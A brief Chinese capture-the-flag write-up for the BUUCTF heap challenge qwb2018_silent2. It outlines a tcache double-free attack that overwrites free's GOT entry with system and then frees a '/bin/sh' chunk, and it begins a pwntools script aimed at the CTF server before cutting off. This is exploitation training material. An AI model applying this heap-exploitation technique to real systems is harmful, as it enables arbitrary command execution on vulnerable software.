BUUCTF qwb2018_slient2
1、该题在BUUCTF上的环境是2.27版本,所以相对来说更加的容易了
2、只需要利用double free 使用tcache attach攻击free函数的got表的地址
3、然后在free的got表中写入sysytem函数的plt表地址
4、再free掉一个写入/bin/sh的chunk即可
from pwn import *
context(os='linux', arch='amd64',log_level='debug')
io=remote("node3.buuoj.cn",29992)
#io=process("silent2")
#libc=ELF("libc-2.27.so")
elf=ELF